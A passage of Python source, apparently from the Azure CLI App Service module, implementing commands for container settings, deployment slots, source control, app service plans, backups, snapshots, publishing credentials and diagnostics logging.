multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
HostNameBinding = cmd.get_models('HostNameBinding')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(location=webapp.location, site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name, hostname, binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name, hostname, binding,
slot)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
SslState = cmd.get_models('SslState')
# logics here are ported from portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
Site, SiteConfig = cmd.get_models('Site', 'SiteConfig')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
Site = cmd.get_models('Site')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.create_or_update_slot(resource_group_name, name, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings.properties, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings.properties, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, cd_app_type=None,
app_working_dir=None, nodejs_task_runner=None, python_framework=None,
python_version=None, cd_account_create=None, cd_project_url=None, test=None,
slot_swap=None, private_repo_username=None, private_repo_password=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
if cd_project_url:
# Add default values
cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
python_framework = 'Django' if python_framework is None else python_framework
python_version = 'Python 3.5.3 x86' if python_version is None else python_version
webapp_list = None if test is None else list_webapp(resource_group_name)
vsts_provider = VstsContinuousDeliveryProvider()
cd_app_type_details = {
'cd_app_type': cd_app_type,
'app_working_dir': app_working_dir,
'nodejs_task_runner': nodejs_task_runner,
'python_framework': python_framework,
'python_version': python_version
}
try:
status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url,
branch, git_token, slot_swap, cd_app_type_details,
cd_project_url, cd_account_create, location, test,
private_repo_username, private_repo_password, webapp_list)
except RuntimeError as ex:
raise CLIError(ex)
logger.warning(status.status_message)
return status
non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
python_version, cd_account_create, test, slot_swap]
if any(non_vsts_params):
raise CLIError('Following parameters are of no use when cd_project_url is None: ' +
'cd_app_type, app_working_dir, nodejs_task_runner, python_framework,' +
'python_version, cd_account_create, test, slot_swap')
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
# for non server errors(50x), just throw; otherwise retry 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
the command will clean up existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
SiteConfigResource = cmd.get_models('SiteConfigResource')
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
site_config = SiteConfigResource(location=location)
site_config.scm_type = 'LocalGit'
if slot is None:
client.web_apps.create_or_update_configuration(resource_group_name, name, site_config)
else:
client.web_apps.create_or_update_configuration_slot(resource_group_name, name,
site_config, slot)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False):
HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
_validate_asp_sku(app_service_environment, sku)
if is_linux and hyper_v:
raise CLIError('usage error: --is-linux | --hyper-v')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
raise CLIError('Windows containers is not yet supported in app service environment')
ase_id = _validate_app_service_environment_id(cmd.cli_ctx, app_service_environment, resource_group_name)
ase_def = HostingEnvironmentProfile(id=ase_id)
ase_list = client.app_service_environments.list()
ase_found = False
for ase in ase_list:
if ase.id.lower() == ase_id.lower():
location = ase.location
ase_found = True
break
if not ase_found:
raise CLIError("App service environment '{}' not found in subscription.".format(ase_id))
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
return sdk_no_wait(no_wait, client.app_service_plans.create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None):
if number_of_workers is None and sku is None:
logger.warning('No update is done. Specify --sku and/or --number-of-workers.')
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
return instance
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(cmd, instance):
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups',
slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
BackupRequest = cmd.get_models('BackupRequest')
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_request = BackupRequest(backup_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
DefaultErrorResponseException, BackupSchedule, BackupRequest = cmd.get_models(
'DefaultErrorResponseException', 'BackupSchedule', 'BackupRequest')
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except DefaultErrorResponseException:
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
RestoreRequest = cmd.get_models('RestoreRequest')
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _get_location_from_resource_group(cli_ctx, resource_group_name):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
group = client.resource_groups.get(resource_group_name)
return group.location
def _get_location_from_webapp(client, resource_group_name, webapp):
webapp = client.web_apps.get(resource_group_name, webapp)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp))
return webapp.location
def _get_deleted_apps_locations(cli_ctx):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
webapp = show_webapp(cmd, resource_group_name, name, slot=slot)
for host in webapp.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def get_publishing_user(cmd):
client = web_client_factory(cmd.cli_ctx)
return client.get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
'''
Update deployment credentials.(Note, all webapps in your subscription will be impacted)
'''
User = cmd.get_models('User')
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot)
full_xml = ''
for f in content:
full_xml += f.decode()
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
SslState = cmd.get_models('SslState')
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
url = site.enabled_host_names[0] # picks the custom domain URL incase a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob suport
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
SiteLogsConfig, HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging is not None:
if not application_logging:
level = 'Off'
elif level is None:
level = 'Error'
fs_log = FileSystemApplicationLogsConfig(level=level)
application_logs = ApplicationLogsConfig(file_system=fs_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
# TODO: az blob storage log config currently not in use, will be impelemented later.
# Tracked as Issue: #4764 on Github
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
# 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return client.web_apps.update_configuration_slot(resource_group_name, webapp, site_config, slot)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
if action == 'swap':
poller = client.web_apps.swap_slot_slot(resource_group_name, webapp,
slot, (target_slot or 'production'), True)
return poller
if action == 'preview':
if target_slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name,
webapp, slot, True)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp,
slot, target_slot, True)
return result
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
RampUpRule = cmd.get_models('RampUpRule')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
